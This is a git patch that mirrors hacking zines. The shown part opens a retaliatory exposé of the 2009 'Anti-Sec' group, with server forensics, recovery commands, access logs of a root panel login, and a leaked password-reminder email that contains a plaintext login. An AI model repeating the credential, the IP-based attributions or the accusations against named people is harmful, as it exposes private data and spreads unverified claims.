From 7f7bcee47a372906b574beee48b71c3e74d19582 Mon Sep 17 00:00:00 2001 From: Rui Reis Date: Wed, 14 Dec 2016 20:33:42 +0000 Subject: [PATCH] 1st import into tree --- README.md | 2 + anti-anti-sec/anti-anti-sec.txt | 11156 ++++++++++++++++++++++++++++ anti-sec/astalavista-comments.txt | 136 + anti-sec/astalavista.txt | 1983 +++++ anti-sec/imageshack-pwned.txt | 95 + anti-sec/romeo-last-stand.txt | 291 + anti-sec/ssanz-pwned.txt | 679 ++ anti-sec/txt/ats-policy.txt | 223 + anti-sec/txt/faq1.txt | 92 + anti-sec/txt/faq2.txt | 70 + anti-sec/txt/hack4.txt | 199 + anti-sec/txt/movement.txt | 48 + anti-sec/txt/scene_sub.txt | 54 + 13 files changed, 15028 insertions(+) create mode 100644 README.md create mode 100644 anti-anti-sec/anti-anti-sec.txt create mode 100644 anti-sec/astalavista-comments.txt create mode 100644 anti-sec/astalavista.txt create mode 100644 anti-sec/imageshack-pwned.txt create mode 100644 anti-sec/romeo-last-stand.txt create mode 100644 anti-sec/ssanz-pwned.txt create mode 100644 anti-sec/txt/ats-policy.txt create mode 100644 anti-sec/txt/faq1.txt create mode 100644 anti-sec/txt/faq2.txt create mode 100644 anti-sec/txt/hack4.txt create mode 100644 anti-sec/txt/movement.txt create mode 100644 anti-sec/txt/scene_sub.txt diff --git a/README.md b/README.md new file mode 100644 index 0000000..26823f0 --- /dev/null +++ b/README.md @@ -0,0 +1,2 @@ +# Zines +mirror of my favourite hacking Zines for the lulz and nostalgy diff --git a/anti-anti-sec/anti-anti-sec.txt b/anti-anti-sec/anti-anti-sec.txt new file mode 100644 index 0000000..96c8610 --- /dev/null +++ b/anti-anti-sec/anti-anti-sec.txt @@ -0,0 +1,11156 @@ + __ .__ +_____ _____/ |_|__| ______ ____ ____ +\__ \ / \ __\ |/ ___// __ \_/ ___\ + / __ \| | \ | | |\___ \\ ___/\ \___ +(____ /___| /__| |__/____ >\___ >\___ > + \/ \/ \/ \/ \/ *no more* +get yours http://www.network-science.de/ascii/ + + +[0x00] [Introduction] +[0x01] [Forensics] +[0x02] [Target Profiling & Lulz] +[0x03] [ownage.net - prosec] +[0x04] [vitalspeeds - prosec] +[0x05] [makosolutions - prosec] +[0x06] [holeinthewallhosting - prosec] +[0x07] [darkmindz - zf05] +[0x08] [Backdoor RCE] +[0x09] [SEO Optimizing] +[0x10] [Reporting] +[0x11] [Attachments] +[0x12] [Conclusion] +[0x13] [Greetz] + + +_______ _______ _______ +\ _ \ ___ __\ _ \ \ _ \ +/ /_\ \\ \/ / /_\ \/ /_\ \ +\ \_/ \> <\ \_/ \ \_/ \ + \_____ /__/\_ \\_____ /\_____ / + \/ \/ \/ \/ hai:] +.___ __ .___ __ .__ +| | _____/ |________ ____ __| _/_ __ _____/ |_|__| ____ ____ +| |/ \ __\_ __ \/ _ \ / __ | | \_/ ___\ __\ |/ _ \ / \ +| | | \ | | | \( <_> ) /_/ | | /\ \___| | | ( <_> ) | \ +|___|___| /__| |__| \____/\____ |____/ \___ >__| |__|\____/|___| / + \/ \/ \/ \/ + + +What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known +as "ProSec" contacted us with reports containing information about the entire group and how it was operating. +We don't know who they are, they appear to be well-funded and top notch security experts and what +they have done against the group is invaluable to us and others that they have and or would have been targeted. +ProSec did want me to portray a message that organizations similar to the Anti-Sec will and are currently being +targeted by the movement. ProSec already has access to a number of them and are continuously monitoring and gathering +more information about the various groups and will release information when applicable. No longer should whitehats +fear these groups, as soon as an individual is targeted, they will target right back. This is a warning shot to +those out there that target us. I want to thank ProSec for the work that they continue to do and understand why this +movement is so important to the security community. + +On the 4th of June 2009, a group named "Anti-Sec" decided to expose Astalavista group after +they successfully exploited what was rumored to be a Litespeed 0day exploit which in reality does not exist. +After looking up on this more and more, a couple of days later we found out that the responsible +person behind this attack was a Saudi-Arabian with the nickname RoMeO, so we decided to let the other +Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators +decided to warn his friend RoMeO about it and as you will notice below Joao Pontes (rorkty) knew +from the beginning that Astalavista group was compromised by his closest friend and decided to do nothing about it. +Later, on the 9th of June one of my dedicated hosting servers, running a couple of websites was targeted +by the same "Anti-Sec" group providing fake and misleading information to the public. + +The reason that we decided to start looking into this subject, was to see how and why my dedicated hosting +server was compromised despite the fact that it was secure enough to provide access to the outside world. + +Below is a list of some security measures that had been taken to ensure no unauthorized access permitted: + +1) Firewall Protection +2) Brute Force Detection and Prevention +3) Kernel Hardening +4) Apache, PHP, SQL Hardening +5) SSH Hardening +6) Wheel access group for su +7) Chrooted Jail Shell +8) Web Application Firewall +9) Network Intrusion Detection +10) Host Intrustion Detection +11) Hidden daemon versions +12) Rootkit Detection +13) DoS Protection +14) All private sites hosted, audited for bugs +15) Root Access Alert +16) Etc + +Unfortunately the interval between compromisation of the server until the alert reports came to our attention +was not enough to prevent the attack. + +After our research and the information provided by the ProSec group we came to the conclusion that the server was +either hit by an 0day exploit or through my dedicated server provider makosolutions.com which later on it shows +that they were backdoored. + +Utilizing passive and active reconnaissance methods resulted to large information acquisitions which provided +us with means for linking together certain information and shade more light on who we are about to target and +research for the attacks that took place under the "Anti-Sec" label. + +In this log file you will read a limited version of the information gathered and provided, since the most important +parts are being kept private in order to be analyzed by the proper authorities. + + +_______ _______ ____ +\ _ \ ___ __\ _ \/_ | +/ /_\ \\ \/ / /_\ \| | +\ \_/ \> <\ \_/ \ | + \_____ /__/\_ \\_____ /___| + \/ \/ \/ +___________ .__ +\_ _____/__________ ____ ____ _____|__| ____ ______ + | __)/ _ \_ __ \_/ __ \ / \ / ___/ |/ ___\ / ___/ + | \( <_> ) | \/\ ___/| | \\___ \| \ \___ \___ \ + \___ / \____/|__| \___ >___| /____ >__|\___ >____ > + \/ \/ \/ \/ \/ \/ + + +Email Incidents + + +Delivered-To: glafkos@gmail.com +Received: by 10.223.104.212 with SMTP id q20cs268734fao; + Tue, 9 Jun 2009 03:58:03 -0700 (PDT) +Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200; + Tue, 09 Jun 2009 03:58:03 -0700 (PDT) +Return-Path: +Received: from freehostia.com ([66.40.52.21]) + by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02; + Tue, 09 Jun 2009 03:58:03 -0700 (PDT) +Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21; +Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com +Received: from root by freehostia.com with local (Exim 4.63) + (envelope-from ) + id 1MDz3p-0002ME-UX + for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000 +To: glafkos@gmail.com +Subject: Hosting account: Password reminder +MIME-Version: 1.0 +Content-type: text/plain; charset=UTF-8 +From: Free Hostia +Cc: +Reply-To: +Message-Id: +Date: Tue, 09 Jun 2009 11:00:09 +0000 + +Dear Glask Chwat, + +at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel. + +We are sending you your account login details: +username: glachw +password: 1779586 + +If you have any questions, please open a new support ticket from the Help section of the Control Panel. + +Best Regards, +Free Hostia Team + + +/* +Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor? +As you can see above, he made this request from his home IP. +*/ + + +Delivered-To: glafkos@gmail.com +Received: by 10.223.104.212 with SMTP id q20cs272895fao; + Tue, 9 Jun 2009 05:26:34 -0700 (PDT) +MIME-Version: 1.0 +Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue, + 09 Jun 2009 05:26:34 -0700 (PDT) +Date: Tue, 9 Jun 2009 15:26:34 +0300 +Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com> +Subject: Lol. +From: james knuth +To: glafkos@gmail.com +Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868 + + +http://pastebin.com/m592e1f1c + +It will be all over the net soon, + +Enjoy. + + +// Indeed.. + + +Server Forensics + +root@srv01 [/home/recovery]# du -h --max-depth=1 +608K ./APF_Backup +992K ./Diff +224K ./Latest +3.3M ./LinkNet +46M ./log +1.2M ./modbin +7.5G ./sdb2recover +361M ./sdb3recover +371M ./sdb5recover +121M ./Software +128K ./OpenSSH_Debug +4.5G ./Evidence +15G . +root@srv01 [/home/recovery]# + +// Obviously this noobcake didn't know that it was possible to recover deleted files + + +root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string* +416K sdb2output.txt +7.5G sdb2recover +361M sdb3recover +7.9M sdb3usrdirlist.txt +371M sdb5recover +22M sdb5tmp.txt +64K sdb8deleted_files.txt +2.5M sdb8home.txt +857M stringfile_sdb2.txt +root@srv01 [/home/recovery]# + +root@srv01 [/home/recovery]# ls -lad sd*recover +drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover +drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover +drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover +root@srv01 [/home/recovery]# + + +root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt +root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt +r/r 2195490: local/cpanel/logs/access_log +r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync +r/r 2362208: local/apache/logs/access_log +root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log +root@srv01 [/home/recovery]# ls -la /tmp/access_log +-rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log +root@srv01 [/home/recovery]# + +// Someone needs to learn how to cover his tracks... try... "man dd" + + +root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54 +188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/cpanel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/ssl.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/restartservices.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1143069318/minus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; 